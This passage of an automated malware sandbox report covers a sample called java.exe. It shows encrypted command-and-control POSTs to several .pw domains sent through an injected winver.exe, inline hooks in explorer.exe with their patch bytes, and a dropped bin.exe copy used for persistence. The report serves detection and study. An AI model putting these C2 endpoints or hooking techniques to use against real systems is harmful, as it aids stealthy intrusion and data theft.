                                                                                                                                                                                        7192.168.2.449742216.218.185.162807344C:\Windows\SysWOW64\winver.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        Dec 22, 2023 21:31:45.756023884 CET98OUTPOST /EiDQjNbWEQ/ HTTP/1.0
                                                                                                                                                                                        Host: fkmmvfeonnyh.pw
                                                                                                                                                                                        Content-Length: 157
                                                                                                                                                                                        Data Raw: 6d 34 3b 95 50 3c 3b 95 83 64 65 0d 6b 36 3a b6 5d 04 0b a5 5d 04 0b a5
                                                                                                                                                                                        Data Ascii: m4;P<;dek6:]]
                                                                                                                                                                                        Dec 22, 2023 21:31:45.958293915 CET133OUTData Raw: 00 80 00 00 00 62 f5 fd 19 63 25 a8 ad 04 48 c3 99 fc d4 a4 f7 d9 59 16 eb 1f 03 67 36 75 23 1e 06 61 13 b5 1c 9e f8 67 62 55 31 a7 f7 2b ca 24 87 54 3a d0 6d 47 7c 58 51 3f 15 0b e3 e0 00 a1 a1 3e c0 e5 50 50 d1 29 7b 2c 9d 09 68 1b 90 b4 75 b1
                                                                                                                                                                                        Data Ascii: bc%HYg6u#agbU1+$T:mG|XQ?>PP){,hubevm[%@Ls*2L<=)aERPZXyWL3\6
                                                                                                                                                                                        Dec 22, 2023 21:31:46.159543037 CET156INHTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx/1.21.6
                                                                                                                                                                                        Date: Fri, 22 Dec 2023 20:31:46 GMT
                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                        Connection: close


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        8192.168.2.449743216.218.185.162807344C:\Windows\SysWOW64\winver.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        Dec 22, 2023 21:31:47.490220070 CET98OUTPOST /EiDQjNbWEQ/ HTTP/1.0
                                                                                                                                                                                        Host: gfnlmtcolrrb.pw
                                                                                                                                                                                        Content-Length: 157
                                                                                                                                                                                        Data Raw: 91 76 5a 68 af 7e 5a 68 7f 26 04 f0 97 74 5b 4b a1 46 6a 58 a1 46 6a 58
                                                                                                                                                                                        Data Ascii: vZh~Zh&t[KFjXFjX
                                                                                                                                                                                        Dec 22, 2023 21:31:47.691407919 CET133OUTData Raw: 00 80 00 00 00 63 f8 fe 18 78 37 ae ad 06 54 c8 93 fc d4 a4 f7 d9 59 16 eb 1f 03 67 36 75 23 1e 06 61 13 b5 1c 1d 51 07 15 09 4b 87 84 91 07 c4 f8 f8 86 f0 1e 9f b9 78 26 e1 59 6b 90 8c db 81 ce 1b 4d 05 3c ab d0 c9 2f 9b d1 29 3d ad f6 d7 28 75
                                                                                                                                                                                        Data Ascii: cx7TYg6u#aQKx&YkM</)=(ucE+GJXpchl,)'yIb[w{
                                                                                                                                                                                        Dec 22, 2023 21:31:47.892774105 CET156INHTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx/1.21.6
                                                                                                                                                                                        Date: Fri, 22 Dec 2023 20:31:47 GMT
                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                        Connection: close


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        9192.168.2.449744216.218.185.162807344C:\Windows\SysWOW64\winver.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        Dec 22, 2023 21:31:48.965379000 CET98OUTPOST /EiDQjNbWEQ/ HTTP/1.0
                                                                                                                                                                                        Host: wwgfyvvdtmeq.pw
                                                                                                                                                                                        Content-Length: 157
                                                                                                                                                                                        Data Raw: ec b1 0c 1d d3 b9 0c 1d 02 e1 52 85 ea b3 0d 3e dc 81 3c 2d dc 81 3c 2d
                                                                                                                                                                                        Data Ascii: R><-<-
                                                                                                                                                                                        Dec 22, 2023 21:31:49.167076111 CET133OUTData Raw: 00 80 00 00 00 73 e9 f7 12 6c 35 bb a6 1e 4b df 80 fc d4 a4 f7 d9 59 16 eb 1f 03 67 36 75 23 1e 06 61 13 b5 1c 68 1b 5c e8 b6 33 52 79 d8 ee 32 0d 69 8e ca eb 26 6a 32 eb fc b1 35 5d 45 9f 4f 1c 04 c0 ff ea 79 3d 03 fd a1 6a 7f e2 ed 04 82 fb ac
                                                                                                                                                                                        Data Ascii: sl5KYg6u#ah\3Ry2i&j25]EOy=jn0o<!r)<Z9R?oenqI6/GL
                                                                                                                                                                                        Dec 22, 2023 21:31:49.369072914 CET156INHTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx/1.21.6
                                                                                                                                                                                        Date: Fri, 22 Dec 2023 20:31:49 GMT
                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                        Connection: close


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        10192.168.2.449745216.218.185.162807344C:\Windows\SysWOW64\winver.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        Dec 22, 2023 21:31:50.428587914 CET98OUTPOST /EiDQjNbWEQ/ HTTP/1.0
                                                                                                                                                                                        Host: xtbbpqfrsubt.pw
                                                                                                                                                                                        Content-Length: 157
                                                                                                                                                                                        Data Raw: f3 e1 ef cd cc e9 ef cd 1d b1 b1 55 f5 e3 ee ee c3 d1 df fd c3 d1 df fd
                                                                                                                                                                                        Data Ascii: U
                                                                                                                                                                                        Dec 22, 2023 21:31:50.629816055 CET133OUTData Raw: 00 80 00 00 00 7c ea f2 16 65 32 ab b0 19 53 d8 85 fc d4 a4 f7 d9 59 16 eb 1f 03 67 36 75 23 1e 06 61 13 b5 1c b1 81 92 bb 34 a3 6c 2e 6a e0 79 5e f3 1b 9f a4 f4 fb e5 99 ed dd c0 2b 67 3a 75 69 64 15 b1 97 6e 9c 5d 80 19 92 b5 97 6f e9 78 8e 93
                                                                                                                                                                                        Data Ascii: |e2SYg6u#a4l.jy^+g:uidn]oxgcp5F`lF0d<-=:?]Pq%
                                                                                                                                                                                        Dec 22, 2023 21:31:50.832914114 CET156INHTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx/1.21.6
                                                                                                                                                                                        Date: Fri, 22 Dec 2023 20:31:50 GMT
                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                        Connection: close


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        11192.168.2.449746216.218.185.162807344C:\Windows\SysWOW64\winver.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        Dec 22, 2023 21:31:52.053474903 CET98OUTPOST /EiDQjNbWEQ/ HTTP/1.0
                                                                                                                                                                                        Host: vrmtybxxpddg.pw
                                                                                                                                                                                        Content-Length: 157
                                                                                                                                                                                        Data Raw: ea 5f bf 93 aa 57 bf 93 04 0f e1 0b ec 5d be b0 da 6f 8f a3 da 6f 8f a3
                                                                                                                                                                                        Data Ascii: _W]oo
                                                                                                                                                                                        Dec 22, 2023 21:31:52.254502058 CET133OUTData Raw: 00 80 00 00 00 72 ec fd 00 6c 21 b5 ba 1a 42 de 96 fc d4 a4 f7 d9 59 16 eb 1f 03 67 36 75 23 1e 06 61 13 b5 1c f8 80 90 7d 5f 02 6e ec 89 71 7e 80 10 41 9e 66 1b db e6 5f f9 49 c1 e9 58 a1 7b a7 2d 00 b3 55 4b 8d 5f 46 a1 4b b3 55 54 2d 7e 70 e8
                                                                                                                                                                                        Data Ascii: rl!BYg6u#a}_nq~Af_IX{-UK_FKUT-~ps(I;A~DG +F;UFbB|oXOfAzk4
                                                                                                                                                                                        Dec 22, 2023 21:31:52.456151009 CET156INHTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx/1.21.6
                                                                                                                                                                                        Date: Fri, 22 Dec 2023 20:31:52 GMT
                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                        Connection: close


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        12192.168.2.449748216.218.185.162807344C:\Windows\SysWOW64\winver.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        Dec 22, 2023 21:31:53.740170002 CET98OUTPOST /EiDQjNbWEQ/ HTTP/1.0
                                                                                                                                                                                        Host: fccfxejgtpqb.pw
                                                                                                                                                                                        Content-Length: 157
                                                                                                                                                                                        Data Raw: ad ed 2a 61 ec e5 2a 61 43 bd 74 f9 ab ef 2b 42 9d dd 1a 51 9d dd 1a 51
                                                                                                                                                                                        Data Ascii: *a*aCt+BQQ
                                                                                                                                                                                        Dec 22, 2023 21:31:53.940949917 CET133OUTData Raw: 00 80 00 00 00 62 fd f3 12 6d 26 a7 a5 1e 56 cb 93 fc d4 a4 f7 d9 59 16 eb 1f 03 67 36 75 23 1e 06 61 13 b5 1c 66 9a 7e 2c eb 8f b0 bd 79 6c 2d f1 b6 9e e8 17 f5 b9 50 2f f2 66 13 99 bf b9 a9 d7 9e 9b 1d 25 a4 ad 21 31 5e ff 01 26 54 e7 ac 3f 4e
                                                                                                                                                                                        Data Ascii: bm&VYg6u#af~,yl-P/f%!1^&T?Nl 3BGI(pOn]UZ:oq`Dp4
                                                                                                                                                                                        Dec 22, 2023 21:31:54.143640041 CET137INHTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx/1.21.6
                                                                                                                                                                                        Date: Fri, 22 Dec 2023 20:31:54 GMT
                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Dec 22, 2023 21:31:54.143652916 CET1INData Raw: 66
                                                                                                                                                                                        Data Ascii: f
                                                                                                                                                                                        Dec 22, 2023 21:32:00.129364014 CET1INData Raw: 63
                                                                                                                                                                                        Data Ascii: c
                                                                                                                                                                                        Dec 22, 2023 21:32:06.119223118 CET1INData Raw: 58
                                                                                                                                                                                        Data Ascii: X
                                                                                                                                                                                        Dec 22, 2023 21:32:12.157475948 CET1INData Raw: 6f
                                                                                                                                                                                        Data Ascii: o
                                                                                                                                                                                        Dec 22, 2023 21:32:18.121309042 CET1INData Raw: 4e
                                                                                                                                                                                        Data Ascii: N
                                                                                                                                                                                        Dec 22, 2023 21:32:24.172709942 CET1INData Raw: 53
                                                                                                                                                                                        Data Ascii: S
                                                                                                                                                                                        Dec 22, 2023 21:32:30.113518953 CET1INData Raw: 6d
                                                                                                                                                                                        Data Ascii: m
                                                                                                                                                                                        Dec 22, 2023 21:32:36.151500940 CET1INData Raw: 6e
                                                                                                                                                                                        Data Ascii: n
                                                                                                                                                                                        Dec 22, 2023 21:32:42.219223022 CET1INData Raw: 43
                                                                                                                                                                                        Data Ascii: C


                                                                                                                                                                                        HTTPS Proxied Packets

                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        0192.168.2.449729173.222.162.324434984C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2023-12-22 20:31:12 UTC2301OUTPOST /threshold/xls.aspx HTTP/1.1
                                                                                                                                                                                        Origin: https://www.bing.com
                                                                                                                                                                                        Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Accept-Language: en-CH
                                                                                                                                                                                        Content-type: text/xml
                                                                                                                                                                                        X-Agent-DeviceId: 01000A4109000CC6
                                                                                                                                                                                        X-BM-CBT: 1696420817
                                                                                                                                                                                        X-BM-DateFormat: dd/MM/yyyy
                                                                                                                                                                                        X-BM-DeviceDimensions: 784x984
                                                                                                                                                                                        X-BM-DeviceDimensionsLogical: 784x984
                                                                                                                                                                                        X-BM-DeviceScale: 100
                                                                                                                                                                                        X-BM-DTZ: 60
                                                                                                                                                                                        X-BM-Market: CH
                                                                                                                                                                                        X-BM-Theme: 000000;0078d7
                                                                                                                                                                                        X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E
                                                                                                                                                                                        X-Device-ClientSession: 0912CF9094994CFA88DE52C6FB19D4E1
                                                                                                                                                                                        X-Device-isOptin: false
                                                                                                                                                                                        X-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}
                                                                                                                                                                                        X-Device-OSSKU: 48
                                                                                                                                                                                        X-Device-Touch: false
                                                                                                                                                                                        X-DeviceID: 01000A4109000CC6
                                                                                                                                                                                        X-MSEdge-ExternalExp: bfbwsbrs0830tf,d-thshldspcl40,msbdsborgv2co,msbwdsbi920t1,spofglclicksh-c2,webtophit0r_t,wsbmsaqfuxtc,wsbqfasmsall_t,wsbqfminiserp400,wsbref-t
                                                                                                                                                                                        X-MSEdge-ExternalExpType: JointCoord
                                                                                                                                                                                        X-PositionerType: Desktop
                                                                                                                                                                                        X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI
                                                                                                                                                                                        X-Search-CortanaAvailableCapabilities: None
                                                                                                                                                                                        X-Search-SafeSearch: Moderate
                                                                                                                                                                                        X-Search-TimeZone: Bias=0; DaylightBias=-60; TimeZoneKeyName=GMT Standard Time
                                                                                                                                                                                        X-UserAgeClass: Unknown
                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                                                                                        Host: www.bing.com
                                                                                                                                                                                        Content-Length: 2232
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Cookie: MUID=6666694284484FA1B35CCB433D42E997; _SS=SID=193A581F83766B4319784BBF829B6A16&CPID=1696420820117&AC=1&CPH=e5c79613&CBV=39942242; _EDGE_S=SID=193A581F83766B4319784BBF829B6A16; SRCHUID=V=2&GUID=BA43D82178364AEA9C1EE6C32BE93416&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231003; SRCHHPGUSR=SRCHLANG=en&LUT=1696420817741&IPMH=425591ef&IPMID=1696420817913&HV=1696417346; ANON=A=6D8F9DF00282E660E425530EFFFFFFFF; CortanaAppUID=4C9C2B2D0465FD7A42C74C7E93CFB630; MUIDB=6666694284484FA1B35CCB433D42E997
                                                                                                                                                                                        2023-12-22 20:31:12 UTC2232OUTData Raw: 3c 43 6c 69 65 6e 74 49 6e 73 74 52 65 71 75 65 73 74 3e 3c 43 49 44 3e 36 36 36 36 36 39 34 32 38 34 34 38 34 46 41 31 42 33 35 43 43 42 34 33 33 44 34 32 45 39 39 37 3c 2f 43 49 44 3e 3c 45 76 65 6e 74 73 3e 3c 45 3e 3c 54 3e 45 76 65 6e 74 2e 43 6c 69 65 6e 74 49 6e 73 74 3c 2f 54 3e 3c 49 47 3e 38 39 32 46 41 30 37 38 38 36 34 31 34 42 44 46 38 45 45 31 37 36 34 41 35 39 46 46 33 39 43 36 3c 2f 49 47 3e 3c 44 3e 3c 21 5b 43 44 41 54 41 5b 7b 22 43 75 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 2f 41 53 2f 41 50 49 2f 57 69 6e 64 6f 77 73 43 6f 72 74 61 6e 61 50 61 6e 65 2f 56 32 2f 49 6e 69 74 22 2c 22 50 69 76 6f 74 22 3a 22 51 46 22 2c 22 54 22 3a 22 43 49 2e 42 6f 78 4d 6f 64 65 6c 22 2c 22 46 49 44 22 3a 22 43
                                                                                                                                                                                        Data Ascii: <ClientInstRequest><CID>6666694284484FA1B35CCB433D42E997</CID><Events><E><T>Event.ClientInst</T><IG>892FA07886414BDF8EE1764A59FF39C6</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","T":"CI.BoxModel","FID":"C
                                                                                                                                                                                        2023-12-22 20:31:13 UTC476INHTTP/1.1 204 No Content
                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        X-MSEdge-Ref: Ref A: 9D4D8C81492A4AA4A3EC867AC8089804 Ref B: CO1EDGE2420 Ref C: 2023-12-22T20:31:13Z
                                                                                                                                                                                        Date: Fri, 22 Dec 2023 20:31:13 GMT
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=93600
                                                                                                                                                                                        X-CDN-TraceID: 0.20a6dc17.1703277072.37a1e4e0


                                                                                                                                                                                        Code Manipulations

                                                                                                                                                                                        User Modules

                                                                                                                                                                                        Hook Summary

                                                                                                                                                                                        Function NameHook TypeActive in Processes
                                                                                                                                                                                        ZwResumeThreadINLINEexplorer.exe
                                                                                                                                                                                        NtQueryDirectoryFileINLINEexplorer.exe
                                                                                                                                                                                        ZwEnumerateValueKeyINLINEexplorer.exe
                                                                                                                                                                                        NtResumeThreadINLINEexplorer.exe
                                                                                                                                                                                        ZwCreateUserProcessINLINEexplorer.exe
                                                                                                                                                                                        NtEnumerateValueKeyINLINEexplorer.exe
                                                                                                                                                                                        NtCreateUserProcessINLINEexplorer.exe
                                                                                                                                                                                        ZwQueryDirectoryFileINLINEexplorer.exe

                                                                                                                                                                                        Processes

                                                                                                                                                                                        Process: explorer.exe, Module: ntdll.dll
                                                                                                                                                                                        Function NameHook TypeNew Data
                                                                                                                                                                                        ZwResumeThreadINLINE0xE9 0x9E 0xE1 0x12 0x25 0x51
                                                                                                                                                                                        NtQueryDirectoryFileINLINE0xE9 0x98 0x81 0x12 0x29 0x91
                                                                                                                                                                                        ZwEnumerateValueKeyINLINE0xE9 0x9C 0xC1 0x12 0x2D 0xD1
                                                                                                                                                                                        NtResumeThreadINLINE0xE9 0x9E 0xE1 0x12 0x25 0x51
                                                                                                                                                                                        ZwCreateUserProcessINLINE0xE9 0x93 0x31 0x11 0x17 0x71
                                                                                                                                                                                        NtEnumerateValueKeyINLINE0xE9 0x9C 0xC1 0x12 0x2D 0xD1
                                                                                                                                                                                        NtCreateUserProcessINLINE0xE9 0x93 0x31 0x11 0x17 0x71
                                                                                                                                                                                        ZwQueryDirectoryFileINLINE0xE9 0x98 0x81 0x12 0x29 0x91

                                                                                                                                                                                        Statistics

                                                                                                                                                                                        CPU Usage

                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                        Memory Usage

                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                        Behavior

                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                        System Behavior

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                        Start time:21:30:53
                                                                                                                                                                                        Start date:22/12/2023
                                                                                                                                                                                        Path:C:\Users\user\Desktop\java.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:C:\Users\user\Desktop\java.exe
                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                        File size:116'224 bytes
                                                                                                                                                                                        MD5 hash:91493A9A9E83A7B48D178AE10F97028D
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:1
                                                                                                                                                                                        Start time:21:30:53
                                                                                                                                                                                        Start date:22/12/2023
                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:2
                                                                                                                                                                                        Start time:21:30:53
                                                                                                                                                                                        Start date:22/12/2023
                                                                                                                                                                                        Path:C:\Windows\SysWOW64\winver.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:winver
                                                                                                                                                                                        Imagebase:0x440000
                                                                                                                                                                                        File size:57'344 bytes
                                                                                                                                                                                        MD5 hash:B5471B0FB5402FC318C82C994C6BF84D
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:3
                                                                                                                                                                                        Start time:21:30:53
                                                                                                                                                                                        Start date:22/12/2023
                                                                                                                                                                                        Path:C:\Windows\explorer.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                                        Imagebase:0x7ff72b770000
                                                                                                                                                                                        File size:5'141'208 bytes
                                                                                                                                                                                        MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:4
                                                                                                                                                                                        Start time:21:31:01
                                                                                                                                                                                        Start date:22/12/2023
                                                                                                                                                                                        Path:C:\Windows\System32\sihost.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:sihost.exe
                                                                                                                                                                                        Imagebase:0x7ff796ef0000
                                                                                                                                                                                        File size:111'616 bytes
                                                                                                                                                                                        MD5 hash:A21E7719D73D0322E2E7D61802CB8F80
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:5
                                                                                                                                                                                        Start time:21:31:01
                                                                                                                                                                                        Start date:22/12/2023
                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                                                                                                                                        Imagebase:0x7ff6eef20000
                                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:6
                                                                                                                                                                                        Start time:21:31:01
                                                                                                                                                                                        Start date:22/12/2023
                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s WpnUserService
                                                                                                                                                                                        Imagebase:0x7ff6eef20000
                                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:7
                                                                                                                                                                                        Start time:21:31:02
                                                                                                                                                                                        Start date:22/12/2023
                                                                                                                                                                                        Path:C:\Windows\System32\ctfmon.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:ctfmon.exe
                                                                                                                                                                                        Imagebase:0x7ff7e3b00000
                                                                                                                                                                                        File size:11'264 bytes
                                                                                                                                                                                        MD5 hash:B625C18E177D5BEB5A6F6432CCF46FB3
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:8
                                                                                                                                                                                        Start time:21:31:02
                                                                                                                                                                                        Start date:22/12/2023
                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                                                                                                        Imagebase:0x7ff6eef20000
                                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:9
                                                                                                                                                                                        Start time:21:31:02
                                                                                                                                                                                        Start date:22/12/2023
                                                                                                                                                                                        Path:C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                        Imagebase:0x7ff7da970000
                                                                                                                                                                                        File size:793'416 bytes
                                                                                                                                                                                        MD5 hash:5CDDF06A40E89358807A2B9506F064D9
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:10
                                                                                                                                                                                        Start time:21:31:04
                                                                                                                                                                                        Start date:22/12/2023
                                                                                                                                                                                        Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                        Imagebase:0x7ff71e800000
                                                                                                                                                                                        File size:103'288 bytes
                                                                                                                                                                                        MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:11
                                                                                                                                                                                        Start time:21:31:04
                                                                                                                                                                                        Start date:22/12/2023
                                                                                                                                                                                        Path:C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                                                                        Imagebase:0x7ff6fdaa0000
                                                                                                                                                                                        File size:3'671'400 bytes
                                                                                                                                                                                        MD5 hash:5E1C9231F1F1DCBA168CA9F3227D9168
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:12
                                                                                                                                                                                        Start time:21:31:09
                                                                                                                                                                                        Start date:22/12/2023
                                                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\F90F00A9\bin.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\F90F00A9\bin.exe"
                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                        File size:116'224 bytes
